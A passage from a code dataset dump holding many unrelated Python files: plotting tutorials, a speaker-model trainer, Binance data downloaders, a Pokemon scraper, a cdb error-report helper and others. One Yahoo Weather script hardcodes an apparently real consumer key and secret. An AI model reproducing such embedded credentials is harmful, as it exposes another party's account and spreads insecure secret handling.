nullable=True)\n start_time = db.Column(db.DateTime, nullable=True)\n end_time = db.Column(db.DateTime, nullable=True)\n location_id = db.Column(db.Integer, nullable=True)\n location_name = db.Column(db.String, nullable=True)\n\n def __init__(self, id, title, type_id):\n self.id = id\n self.title = title\n self.type_id = type_id\n\n def matches_day(self, day_of_month):\n if day_of_month == 0:\n return self.start_time is None\n else:\n if not self.start_time:\n return False\n return int(self.start_time.strftime('%d')) == day_of_month\n\n\n\n","sub_path":"models/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}{"seq_id":"186710906","text":"# -*- coding: utf-8 -*-\r\n\r\nimport os\r\nimport numpy as np\r\nfrom sklearn import mixture\r\nimport random\r\n\r\nname = 'ubm-female'\r\nconv_t = 'diag'\r\n\r\ndirname = 'E:\\\\Data\\\\mozilla-dataset\\\\GMM-UBM\\\\traindata'\r\n\r\nif name == 'ubm':\r\n dirname = os.path.join(dirname, 'traindata')\r\nif name == 'ubm-male':\r\n dirname = os.path.join(dirname, 'traindata-male')\r\nif name == 'ubm-female':\r\n dirname = os.path.join(dirname, 'traindata-female')\r\n\r\nfilelist = os.listdir(dirname)\r\n\r\ntrain = list()\r\n\r\nfor f in filelist:\r\n print(f)\r\n filename = os.path.join(dirname, f)\r\n mfccs = np.load(filename)\r\n train.extend(mfccs.tolist())\r\n\r\ngmm = mixture.GaussianMixture(n_components=64, max_iter=200, covariance_type=conv_t, \r\n verbose=1, verbose_interval=10)\r\ngmm.fit(train)\r\n\r\nnp.save('E:\\\\Data\\\\mozilla-dataset\\\\GMM-UBM\\\\gmm\\\\' + name, [gmm])","sub_path":"GMM-UBM/ubm.py","file_name":"ubm.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}{"seq_id":"544569807","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 31 15:40:12 2017\n@author: hsdicicco\n\nUsed as a space to learn / understand matplotlib contour plotting.\n\"\"\"\n\nimport matplotlib\nimport numpy as np\nimport matplotlib.cm as cm\nimport matplotlib.mlab as mlab
\nimport matplotlib.pyplot as plt\n\nmatplotlib.rcParams['xtick.direction'] = 'out'\nmatplotlib.rcParams['ytick.direction'] = 'out'\n\ndelta = 0.025\nx = np.arange(-3.0,3.0, delta)\ny = np.arange(-3.0,3.0, delta) \nX,Y = np.meshgrid(x,y)\nZ1 = mlab.bivariate_normal(X,Y,1.0,1.0,0.0,0.0)\nZ2 = mlab.bivariate_normal(X,Y,1.5,0.5,1,1)\n\nZ = 10.0 * (Z2-Z1)\n\ndef simplestWithLabels():\n plt.figure()\n CS = plt.contour(X,Y,Z)\n plt.clabel(CS, inline=1, fontsize=10)\n plt.title('Simplest default with labels')\n plt.show()\n\ndef manualLabels(manual_locations):\n plt.figure()\n CS = plt.contour(X,Y,Z)\n plt.clabel(CS, inline = 1, fontsize = 10, manual = manual_locations)\n plt.title('labels at selected locations')\n plt.show()\n \ndef sameColor():\n plt.figure()\n CS = plt.contour(X,Y,Z,6,\n colors = 'k'\n )\n plt.clabel(CS, fontsize = 9, inline = 1)\n plt.title('single color - neg. contours disabled')\n plt.show()\n \ndef colormap():\n # Or you can use a colormap to specify the colors; the default\n # colormap will be used for the contour lines\n plt.figure()\n im = plt.imshow(Z, interpolation='bilinear', origin='lower',\n cmap=cm.gray, extent=(-3, 3, -2, 2))\n levels = np.arange(-1.2, 1.6, 0.2)\n CS = plt.contour(Z, levels,\n origin='lower',\n linewidths=2,\n extent=(-3, 3, -2, 2))\n \n # Thicken the zero contour.\n zc = CS.collections[6]\n plt.setp(zc, linewidth=4)\n \n plt.clabel(CS, levels[1::2], # label every second level\n inline=1,\n fmt='%1.1f',\n fontsize=10)\n \n # make a colorbar for the contour lines\n CB = plt.colorbar(CS, shrink=0.8, extend='both')\n \n plt.title('Lines with colorbar')\n #plt.hot() # Now change the colormap for the contour lines and colorbar\n plt.flag()\n \n # We can still add a colorbar for the image, too.\n CBI = plt.colorbar(im, orientation='horizontal', shrink=0.8)\n \n # This makes the original colorbar look a bit out of place,\n # so let's improve its position.\n \n l, b, w, h = plt.gca().get_position().bounds\n ll, bb, ww, hh = CB.ax.get_position().bounds\n CB.ax.set_position([ll, b + 0.1*h, ww, h*0.8])\n \n \n plt.show()\n\nif __name__ == '__main__':\n #simplestWithLabels() \n colormap()\n #manualLabels([(-1,-1.4),(-0.62, -0.7),(-2,0.5),(1.7, 1.2),(2.0, 1.4),(2.4, 1.7)])\n","sub_path":"testingground/junk/contourplotting_TUTORIAL.py","file_name":"contourplotting_TUTORIAL.py","file_ext":"py","file_size_in_byte":2765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}{"seq_id":"536868229","text":"import time, uuid, urllib.request\nimport hmac, hashlib\nfrom base64 import b64encode\nimport simplejson\n\n\"\"\"\nBasic info\n\"\"\"\napp_id = '1iwjOr74'\nconsumer_key = 'dj0yJmk9QlByUXZXTWFaMWxNJmQ9WVdrOU1XbDNhazl5TnpRbWNHbzlNQS0tJnM9Y29uc3VtZXJzZWNyZXQmc3Y9MCZ4PTAx'\nconsumer_secret = 'ddbe645c629a0099229b3e226d3bc46285bf5794'\nurl = 'https://weather-ydn-yql.media.yahoo.com/forecastrss'\nmethod = 'GET'\nconcat = '&'\nquery = {'location': 'córdoba,ar', 'format': 'json', 'u': 'c'}\noauth = {\n 'oauth_consumer_key': consumer_key,\n 'oauth_nonce': uuid.uuid4().hex,\n 'oauth_signature_method': 'HMAC-SHA1',\n 'oauth_timestamp': str(int(time.time())),\n 'oauth_version': '1.0'\n}\n\n#Prepare signature string (merge all params and SORT them)\n\nmerged_params = query.copy()\nmerged_params.update(oauth)\nsorted_params = [k + '=' + urllib.parse.quote(merged_params[k], safe='') for k in sorted(merged_params.keys())]\n
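# (added note) the OAuth 1.0 signature base string is METHOD&enc(URL)&enc(sorted params), where enc() is percent-encoding\n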
signature_base_str = method + concat + urllib.parse.quote(url, safe='') + concat + urllib.parse.quote(concat.join(sorted_params), safe='')\n\n#Generate signature\n\ncomposite_key = urllib.parse.quote(consumer_secret, safe='') + concat\noauth_signature = b64encode(hmac.new(composite_key.encode('utf-8'), signature_base_str.encode('utf-8'), hashlib.sha1).digest())\n\n#Prepare Authorization header\n\noauth['oauth_signature'] = oauth_signature.decode('utf-8')\nauth_header = 'OAuth ' + ', '.join(['{}=\"{}\"'.format(k,v) for k,v in oauth.items()])\n\n#Send request\n\nurl = url + '?' + urllib.parse.urlencode(query)\nrequest = urllib.request.Request(url)\nrequest.headers['Authorization'] = auth_header\nrequest.headers['X-Yahoo-App-Id']= app_id\nresponse = urllib.request.urlopen(request).read()\n\nr = simplejson.loads(response.decode('utf-8'))\n\nprint('Location : ' + r['location']['city'])\nprint('Country : ' + r['location']['country'])\nprint('WOEID : ' + str(r['location']['woeid']))\n","sub_path":"Twittalking/get_woeid.py","file_name":"get_woeid.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}{"seq_id":"640166618","text":"from binance import ThreadedWebsocketManager\n\nsymbol = \"BTCUSDT\"\n\ntwm = ThreadedWebsocketManager()\ntwm.start()\n\ndef handle_socket_message(msg):\n print(msg)\n\n\"\"\"\nFrequencies:\n 1000ms(default) or 100ms\n\nSnapshot Depth Update: \n https://binance-docs.github.io/apidocs/spot/en/#partial-book-depth-streams \n @depth\n @depth@100ms\n\nDelta Depth Update: \n https://binance-docs.github.io/apidocs/spot/en/#diff-depth-stream\n @depth \n @depth@100ms\n\"\"\"\n\n\"\"\"\nSnapshot Update:\n symbol@depth5@100ms\n\"\"\"\ntwm.start_depth_socket(callback=handle_socket_message, symbol=symbol, depth=5, interval=100)\n\"\"\"\nDelta Update:\n symbol@depth@100ms\n\"\"\"\ntwm.start_depth_socket(callback=handle_socket_message, symbol=symbol, interval=100)\n\ntwm.join()\ntwm.stop()\n\n","sub_path":"scripts/202109102202.py","file_name":"202109102202.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}{"seq_id":"315353698","text":"# _*_ coding: utf-8 _*_\n\n\"\"\"\n Calculate grid derivative.\n\"\"\"\n\nimport numpy as np\nfrom dk_met_base.arr import conform_dims\n\n\ndef center_finite_diff_n(grid, dim=1, r=None, map_scale=None,\n cyclic=False, second=False):\n \"\"\"\n Performs a centered finite difference operation on the given dimension.\n\n using:\n Central finite difference scheme second order for first derivatives\n (u[i+1]-u[i-1])/(2dx)\n Central finite difference scheme second order for second derivatives\n (u[i+1]+u[i-1]-2*u[i])/(dx*dx)\n\n reference:\n http://www.cfm.brown.edu/people/jansh/resources/APMA1180/fd.pdf\n\n notice: for second derivatives, ensure equal interval.\n\n :param grid: a multi-dimensional numpy array.\n :param r: A scalar, one-dimensional, or multi-dimensional array containing\n the coordinates along which grid is to be differenced.
It need not be equally spaced from a computational point of view.\n >scalar: r assumed to be the (constant) distance between\n adjacent points.\n >one-dimensional (and the same size as the dimension of\n grid): applied to all dimensions of grid.\n >multi-dimensional: then it must be the same size as grid.\n :param dim: A scalar integer indicating which dimension of grid to\n calculate the center finite difference on.\n Dimension numbering starts at 1, default=1.\n :param map_scale: map scale coefficient, a scalar, one-dimensional,\n or multi-dimensional array like r.\n :param cyclic: cyclic or periodic boundary.\n :param second: calculate second derivatives, default is first derivatives.\n :return: finite difference array.\n \"\"\"\n\n # move specified dimension to the first\n p = np.arange(grid.ndim)\n p[-1] = dim - 1\n p[dim-1] = -1\n grid = np.transpose(grid, p)\n\n # construct shift vector\n sf = np.arange(grid.ndim)\n sf[0] = -1\n sb = np.arange(grid.ndim)\n sb[0] = 1\n\n # check coordinates\n if r is not None:\n if np.size(r) == 1: # scalar or single value: constant spacing (len() would fail on a plain scalar)\n rr = np.arange(grid.shape[0], dtype=float) * r\n else:\n rr = r\n if np.ndim(rr) == 1:\n rr = conform_dims(grid.shape, rr, [0])\n else:\n rr = np.transpose(rr, p)\n\n if map_scale is not None: # check map scale\n mps = map_scale\n if np.ndim(mps) == 1:\n mps = conform_dims(grid.shape, mps, [0])\n if np.ndim(mps) > 1:\n mps = np.transpose(mps, p)\n rr *= mps\n\n #\n # Compute center finite difference\n #\n\n # first derivative\n if not second:\n # value difference\n dgrid = np.roll(grid, -1, -1) - np.roll(grid, 1, -1)\n\n # grid space\n if r is not None:\n drr = np.roll(rr, -1, -1) - np.roll(rr, 1, -1)\n\n # deal boundary\n if cyclic:\n dgrid[..., 0] = grid[..., 1] - grid[..., -1]\n dgrid[..., -1] = grid[..., 0] - grid[..., -2]\n if r is not None:\n drr[..., 0] = 2*(rr[..., 1] - rr[..., 0])\n drr[..., -1] = 2*(rr[..., -1] - rr[..., -2])\n else:\n dgrid[..., 0] = grid[..., 1] - grid[..., 0]\n dgrid[..., -1] = grid[..., -1] - grid[..., -2]\n if r is not None:\n drr[..., 0] = rr[..., 1] - rr[..., 0]\n drr[..., -1] = rr[..., -1] - rr[..., -2]\n else:\n # value difference\n dgrid = np.roll(grid, -1, -1) - 2*grid + np.roll(grid, 1, -1)\n\n # grid space\n if r is not None:\n drr = (np.roll(rr, -1, -1) - rr) * (rr - np.roll(rr, 1, -1))\n\n # deal boundary\n if cyclic:\n dgrid[..., 0] = grid[..., 1] + grid[..., -1] - 2*grid[..., 0]\n dgrid[..., -1] = grid[..., 0] + grid[..., -2] - 2*grid[..., -1]\n if r is not None:\n drr[..., 0] = (rr[..., 1] - rr[..., 0]) * \\\n (rr[..., -1] - rr[..., -2])\n drr[..., -1] = drr[..., 0]\n else:\n dgrid[..., 0] = grid[..., 0] + grid[..., 2] - 2 * grid[..., 1] # one-sided second difference at the left edge uses points 0, 1, 2 (was grid[..., -2])\n dgrid[..., -1] = grid[..., -1] + grid[..., -3] - 2 * grid[..., -2]\n if r is not None:\n drr[..., 0] = (rr[..., 1] - rr[..., 0]) * \\\n (rr[..., 2] - rr[..., 1])\n drr[..., -1] = (rr[..., -1] - rr[..., -2]) * \\\n (rr[..., -2] - rr[..., -3])\n\n # compute derivatives\n if r is not None:\n dgrid /= drr\n\n # restore grid array\n grid = np.transpose(grid, p)\n dgrid = np.transpose(dgrid, p)\n\n # return\n return dgrid\n
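\n# usage sketch (added by the editor; not part of the original module):\n#   x = np.linspace(0, 2*np.pi, 100)\n#   dfdx = center_finite_diff_n(np.sin(x), dim=1, r=x[1] - x[0])  # approximates cos(x) away from the edges\n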
","sub_path":"dk_met_base/derivative.py","file_name":"derivative.py","file_ext":"py","file_size_in_byte":4751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}{"seq_id":"248346194","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\n\n\n# Used for cookie signing; replace this with a random, sufficiently long and complex string\n# !!! Do not keep the current one\nCOOKIE_SECRET = \"May the Force Be with you\"\n\n\n# Database file path; defaults to the same directory as this config file\n# eg. DATABASE = \"/home/myblog/mydb.db\"\nDATABASE = \"/home/serho/website/newblog.db\"\n\n\n# Your blog name\nSITE_NAME = \"I'm SErHo\"\n\n\n# Path to the Picky directory; defaults to the same directory as this config file\nPICKY_DIR = \"/home/serho/website/picky\"\n\n\n# In production you can turn off the Debug option; compiled templates are then cached, which speeds up rendering\n# Note that after changing templates or code you must restart the blog for the changes to take effect\n# DEBUG = True\nDEBUG = False\n\n\ndel os\n","sub_path":"blogconfig.py","file_name":"blogconfig.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}{"seq_id":"217686219","text":"# -*- coding: utf-8 -*-\n\ndef impar(x):\n if x%2==1:\n return(True)\n else:\n return(False)\nfor i in range(1000,10000,1) :\n soma = 0\n cont = 1\n if (i%2!=0) :\n while(i>0) :\n if (cont%2!=0) :\n soma = soma-(i%10)\n else :\n soma = soma+(i%10)\n cont = cont+1\n i = i//10\n print(i)","sub_path":"moodledata/vpl_data/148/usersdata/268/86826/submittedfiles/testes.py","file_name":"testes.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}{"seq_id":"640201247","text":"num = input(\"Enter ISBN: \")\nsum1 = 0\nsum2 = 0\nfor index in range (0,12,2): # only the first 12 digits feed the ISBN-13 check digit (was range(0,13,2))\n temp = int(num[index])\n sum1 = sum1 + temp\nfor index2 in range (1,12,2):\n temp2 = int(num[index2])*3\n sum2 = sum2 + temp2\ntotal = sum1 + sum2 \nremain = total % 10\nx13 = (10 - remain) % 10 # the final % 10 maps a remainder of 0 to a check digit of 0","sub_path":"isbn3.py","file_name":"isbn3.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}{"seq_id":"276777575","text":"#!/usr/bin/env python3\n\nfrom flask import Flask, jsonify\nfrom git import Repo, NoSuchPathError\nfrom os import environ\n\nfrom . import settings\n\napp = Flask(__name__)\n\n@app.route(\"/\", methods=['GET'])\ndef home():\n response = {'head': ''}\n code_dir = settings.QSEE_CODE_DIR\n response['code_dir'] = code_dir\n try:\n repo = Repo(code_dir)\n response['head'] = repo.head.ref.name\n response['status'] = 'success'\n except NoSuchPathError as e:\n response['messages'] = 'no such path '\n response['status'] = 'failed'\n return jsonify(response)\n","sub_path":"qsee/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}{"seq_id":"650211826","text":"from __future__ import division, absolute_import, print_function\n\nimport backtrader as bt\nimport numpy as np\nimport pandas as pd\n\nfrom datetime import datetime\nfrom dateutil import parser\nfrom binance.client import Client\n\nimport time\nimport pytz\n\n\nclass BinanceDownloadApp:\n\n # https://github.com/pratikpv/cryptocurrency_data_downloader/blob/master/download_data_from_binance.py\n\n FMT = \"%Y-%m-%d %H:%M:%S\" # e.g. 
2019-11-16 23:16:15\n ORG_COLS = ['open', 'high', 'low', 'close', 'volume', 'close_time',\n 'quote_av', 'trades', 'tb_base_av', 'tb_quote_av', 'ignore']\n COLS = ['open', 'high', 'low', 'close', 'volume']\n INTERVALS = {\n (bt.TimeFrame.Minutes, 1): '1m',\n (bt.TimeFrame.Minutes, 3): '3m',\n (bt.TimeFrame.Minutes, 5): '5m',\n (bt.TimeFrame.Minutes, 15): '15m',\n (bt.TimeFrame.Minutes, 30): '30m',\n (bt.TimeFrame.Minutes, 60): '1h',\n (bt.TimeFrame.Minutes, 120): '2h',\n (bt.TimeFrame.Minutes, 240): '4h',\n (bt.TimeFrame.Minutes, 360): '6h',\n (bt.TimeFrame.Minutes, 480): '8h',\n (bt.TimeFrame.Minutes, 720): '12h',\n (bt.TimeFrame.Days, 1): '1d',\n (bt.TimeFrame.Days, 3): '3d',\n (bt.TimeFrame.Weeks, 1): '1w',\n (bt.TimeFrame.Months, 1): '1M'\n }\n\n def __init__(self, api_key, api_secret):\n self.api_key = api_key\n self.api_secret = api_secret\n self.client = Client(self.api_key, self.api_secret)\n\n def download(self, filename, symbol, timeframe, compression,\n from_date, to_date, pause=-1):\n \"\"\"\n :param filename:\n :param symbol:\n :param timeframe:\n :param compression:\n :param from_date:\n :param to_date:\n :param pause: pause seconds before downloading next batch.\n if pause == -1 --> random sleep(2,5)\n if pause == 0 --> no sleep\n if pause == num--> sleep for num of seconds\n :return:\n \"\"\"\n if (timeframe, compression) not in self.INTERVALS:\n raise Exception(\n f'Unsupported ({timeframe}-{compression})'\n + ' granularity provided')\n interval = self.INTERVALS[(timeframe, compression)]\n try:\n data = pd.read_csv(filename)\n data_len = len(data)\n from_date = parser.parse(data.iloc[-1].time, ignoretz=True)\n except IOError:\n data_len = 0\n from_millis = self._toUnixMillis(from_date)\n to_millis = None\n if to_date:\n to_millis = self._toUnixMillis(to_date)\n count = 0\n while True:\n # download data\n print(f'Fetching binance historical data for {symbol}'\n + f' {from_date} ({count + 1})')\n klines = self.client.get_historical_klines(\n symbol, interval, str(from_millis), str(to_millis))\n new_columns = self.ORG_COLS.copy()\n new_columns.insert(0, 'time')\n if len(klines) > 0:\n data_df = pd.DataFrame(\n klines, columns=new_columns)\n else:\n break\n for i in self.ORG_COLS:\n if i not in self.COLS:\n del data_df[i]\n data_df['time'] = pd.to_datetime(\n data_df['time'], unit='ms')\n\n # if first line then output also headers\n if data_len == 0:\n data_df.to_csv(filename, index=False)\n else:\n data_df[1:].to_csv(filename, header=None,\n index=False, mode='a')\n data_len += len(data_df)\n\n # check for exit\n if to_millis and from_millis >= to_millis:\n break\n if from_date == data_df.iloc[-1].time:\n break\n # move to next step of batches\n from_date = data_df.iloc[-1].time\n from_millis = self._toUnixMillis(from_date)\n count = count + 1\n if pause == -1:\n pause = np.random.randint(2, 5)\n time.sleep(pause)\n\n def _convertTimeToUtc(self, pst_time):\n utc = pytz.utc\n pst = pytz.timezone('America/Los_Angeles')\n datetime1 = datetime.strptime(pst_time, self.FMT)\n pst_time = pst.localize(datetime1)\n return pst_time.astimezone(utc).strftime(self.FMT)\n\n def _convertTimeToPst(self, utc_time):\n datetime_obj = datetime.strptime(utc_time, self.FMT)\n return datetime_obj.replace(\n tzinfo=time.timezone('UTC')).strftime(self.FMT)\n\n def _toUnixMillis(self, from_date):\n past = datetime(1970, 1, 1, tzinfo=from_date.tzinfo)\n return int((from_date - past).total_seconds() * 1000.0)\n\n def _toDatetime(self, ms):\n return datetime.fromtimestamp(int(float(ms) / 
1000.0))\n","sub_path":"btconfig/utils/download/binance.py","file_name":"binance.py","file_ext":"py","file_size_in_byte":4858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"392423967","text":"import click\nimport requests\nimport json\nimport os\nfrom os import environ\nfrom colored import fg\nfrom colored import stylize\nfrom colored import attr\n\n\n# getting the base API URL\nif environ.get('VECTORDASH_BASE_URL'):\n VECTORDASH_URL = environ.get('VECTORDASH_BASE_URL')\n print(\"Using development URL: {}\".format(VECTORDASH_URL))\nelse:\n VECTORDASH_URL = \"https://vectordash.com/\"\n\n\n@click.command(name='list')\ndef list():\n \"\"\"\n Lists your active GPU instances.\n \"\"\"\n try:\n token = os.path.expanduser('~/.vectordash/token')\n\n if os.path.isfile(token):\n with open(token, 'r') as f:\n secret_token = f.readline()\n\n # building the full URL\n full_url = VECTORDASH_URL + \"api/list_machines/\" + str(secret_token)\n\n r = requests.get(full_url)\n\n if r.status_code == 200:\n data = r.json()\n\n if len(data) > 0:\n green_bolded = fg(\"green\") + attr(\"bold\")\n print(\"Your Vectordash instances:\")\n for i in range(len(data)):\n\n # getting the machine dict (we add one since we don't zero index the list we print out)\n machine = data[str(i + 1)]\n pretty_id = stylize(\"[\" + str(i + 1) + \"]\", green_bolded)\n\n # building the string to print out\n machine_string = str(pretty_id) + \" \" + str(machine['name'])\n\n # if an error has occurred, we display an error\n if machine['error_occurred']:\n machine_string = machine_string + stylize(\" (unexpected error)\", fg(\"red\"))\n\n # if the machine is not ready yet\n elif not machine['ready']:\n machine_string = machine_string + \" (starting)\"\n\n print(machine_string)\n else:\n vd = stylize(VECTORDASH_URL + \"create/\", fg(\"blue\"))\n print(\"You currently have no instances. Go to \" + vd + \" to start an instance.\")\n else:\n print(stylize(\"Invalid token. Please enter a valid token.\", fg(\"red\")))\n\n else:\n print(stylize(\"Unable to locate token. Please make sure a valid token is stored.\", fg(\"red\")))\n print(\"Run \" + stylize(\"vectordash secret \", fg(\"blue\")))\n print(\"Your token can be found at \" + stylize(\"https://vectordash.com/edit/verification\", fg(\"blue\")))\n\n except TypeError:\n type_err = \"Please make sure a valid token is stored. 
Run \"\n print(type_err + stylize(\"vectordash secret \", fg(\"blue\")))\n","sub_path":"vectordash/cli/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"275308113","text":"from bs4 import BeautifulSoup\nfrom collections import defaultdict\nimport requests\nimport time\nimport json\nimport pandas as pd\n\n\ndef get_pokemon_types(poke):\n url = \"https://pokemondb.net/pokedex/\" + poke\n r = requests.get(url)\n soup = BeautifulSoup(r.content, 'html')\n vitals = soup.find('table', {'class':'vitals-table'})\n typeset = vitals.find_all('tr')[1].find_all('a')\n type_list = [typ.text for typ in typeset]\n return type_list\n\nproblem_pokes = {\n 133:['Psychic','Fairy'],\n 436:['Grass','Dragon'],\n 441:['Dragon','Fairy'],\n 445:['Normal','Fighting'],\n 456:['Water','Dark'],\n 457:['Bug','Flying'],\n 460:['Steel'],\n 469:['Electric','Dragon'],\n 472:['Normal','Fairy'],\n 515:['Ice','Steel'],\n 517:['Psychic','Fairy'],\n 518:['Electric','Fairy'],\n 522:['Grass','Fairy'],\n 524:['Water','Fairy'],\n 540:['Dragon','Fighting'],\n 528:['Electric','Psychic'],\n 530:['Fire','Ghost'],\n 537:['Poison','Dark'],\n 538:['Ice','Fairy'],\n 548:['Grass','Dragon'],\n 562:['Normal'],\n 574:['Ground','Steel'],\n 575:['Dark'],\n 577:['Rock','Electric'],\n 583:['Dark','Normal'],\n 598:['Dark','Normal'],\n 601:['Dragon','Fighting'],\n 631:['Ice', 'Psychic'],\n 638:['Fighting'],\n 634:['Poison','Fairy'],\n 650:['Ice','Psychic'],\n 652:['Ice'],\n 653:['Psychic','Fairy'],\n 678:['Ghost'],\n 681:['Ground','Steel'],\n 684:['Fighting'],\n 690:['Dark','Normal'],\n 697:['Psychic'],\n 709:['Poison','Psychic'],\n 708:['Fighting','Water']\n}\n\nif __name__ == '__main__':\n pokemon_df = pd.read_csv('~/Pokestars/data/clean/pokemon_reference.csv')\n\n pokemon_df['type_1'] = 'None'\n pokemon_df['type_2'] = 'None'\n\n for row in pokemon_df.iterrows():\n poke = row[1]['name'].lower().split('-')[0]\n try:\n type_list = get_pokemon_types(poke)\n\n pokemon_df['type_1'].loc[row[0]] = type_list[0]\n\n if len(type_list) > 1:\n pokemon_df['type_2'].loc[row[0]] = type_list[1]\n except:\n print (f'Pokemon: {row[1][\"name\"]} ID: {row[0]} FAILED')\n #THE PRINT STATEMENT SHOULD BE RESOLVED BY THE PROBLEM_POKES dictionary LOOP BELOW\n #IF AN ID THROWS AN ERROR NOT IN THE DICTIONARY IT IS PROBABLY A CONNECTION ISSUE\n\n time.sleep(8)\n if row[0] % 50 == 0:\n print (f'{row[0]} out of {pokemon_df.shape[0]} Pokemon complete')\n \n for key, type_list in problem_pokes.items():\n for typ in type_list:\n if typ not in list(pokemon_df.type_1) or typ not in list(pokemon_df.type_2):\n print (f'ERROR @ : {key}')\n pokemon_df['type_1'].loc[key] = type_list[0]\n if len(type_list) > 1:\n pokemon_df['type_2'].loc[key] = type_list[1]\n \n\n print ('completed all')\n pokemon_df.to_csv('~/Pokestars/data/clean/pokemon_withtypes_reference.csv')","sub_path":"src/scrape_pokemon_types.py","file_name":"scrape_pokemon_types.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"375432464","text":"import re;\n\n# Hide some functions at the top of the stack that are merely helper functions and not relevant to the error:\nasHiddenTopFrames = [\n \"KERNELBASE.dll!RaiseException\",\n \"msvcrt.dll!CxxThrowException\",\n \"msvcrt.dll!_CxxThrowException\",\n \"MSVCR110.dll!CxxThrowException\",\n \"MSVCR110.dll!_CxxThrowException\",\n]\n# Some C++ exceptions may be 
out-of-memory errors.\nddtxErrorTranslations_by_uExceptionCode = {\n 0xe06d7363: { # This entry was created before the code determined the exception class name...\n \"OOM\": (\n \"The process triggered a C++ exception to indicate it was unable to allocate enough memory\",\n None,\n [\n [\n \"KERNELBASE.dll!RaiseException\",\n \"msvcrt.dll!_CxxThrowException\",\n \"jscript9.dll!Js::Throw::OutOfMemory\",\n ],\n ],\n ),\n },\n};\nddtxErrorTranslations_by_sExceptionCallName = {\n \"std::bad_alloc\": {\n \"OOM\": (\n \"The process triggered a std::bad_alloc C++ exception to indicate it was unable to allocate enough memory\",\n None,\n [\n [\n \"KERNELBASE.dll!RaiseException\",\n \"msvcrt.dll!_CxxThrowException\",\n ],\n ],\n ),\n },\n};\n\ndef cErrorReport_foSpecialErrorReport_CppException(oErrorReport, oCdbWrapper):\n # Attempt to get the symbol of the virtual function table of the object that was thrown and add that the the type id:\n oException = oErrorReport.oException;\n assert len(oException.auParameters) >= 3, \\\n \"Expected a C++ Exception to have at least 3 parameters, got %d\" % len(oException.auParameters);\n poException = oException.auParameters[1];\n asExceptionVFtablePointer = oCdbWrapper.fasSendCommandAndReadOutput(\"dps 0x%X L1\" % poException);\n if not oCdbWrapper.bCdbRunning: return None;\n sCarriedLine = \"\";\n for sLine in asExceptionVFtablePointer:\n oExceptionVFtablePointerMatch = re.match(r\"^[0-9A-F`]+\\s*[0-9A-F`\\?]+(?:\\s+(.+))?\\s*$\", asExceptionVFtablePointer[0], re.I);\n assert oExceptionVFtablePointerMatch, \"Unexpected dps result:\\r\\n%s\" % \"\\r\\n\".join(asExceptionVFtablePointer);\n sExceptionObjectVFTablePointerSymbol = oExceptionVFtablePointerMatch.group(1);\n if sExceptionObjectVFTablePointerSymbol is None: break;\n sExceptionObjectSymbol = sExceptionObjectVFTablePointerSymbol.rstrip(\"::`vftable'\");\n if \"!\" not in sExceptionObjectSymbol:\n # No symbol information available, just an address\n dtxErrorTranslations = ddtxErrorTranslations_by_uExceptionCode.get(oException.uCode);\n if dtxErrorTranslations:\n oErrorReport = oErrorReport.foTranslateError(dtxErrorTranslations);\n break;\n sModuleCdbId, sExceptionClassName = sExceptionObjectSymbol.split(\"!\", 1);\n oErrorReport.sErrorTypeId += \":%s\" % sExceptionClassName;\n dtxErrorTranslations = ddtxErrorTranslations_by_sExceptionCallName.get(sExceptionClassName);\n if dtxErrorTranslations:\n oErrorReport = oErrorReport.foTranslateError(dtxErrorTranslations);\n break;\n if oErrorReport:\n oErrorReport.oStack.fHideTopFrames(asHiddenTopFrames);\n return oErrorReport;\n","sub_path":"cErrorReport_foSpecialErrorReport_CppException.py","file_name":"cErrorReport_foSpecialErrorReport_CppException.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"470247046","text":"#!/usr/bin/env python\n\nimport re\n\nclass Test:\n \"\"\" One ATN test along with test results and log pointers \"\"\"\n urlbase=''\n def __init__(s,urlbase):\n s.urlbase=urlbase\n s.name = 'EMPTY'\n # exit status\n s.overall = False\n s.exit = False\n s.error = None\n s.exitcode = None\n # links to log segments:\n s.lextract = None\n s.lerror = None\n s.ldir = None\n s.ltail = None\n s.llog = None\n def initAtn(s,row):\n \"\"\" Initializes one ATN test from a BeautifulSoup-formatted table row \"\"\"\n s.row = v = row.findAll('td')\n assert len(v)==14,'Expecting 14 columns in ATN results table but found: %d'%len(v)\n s.name = 
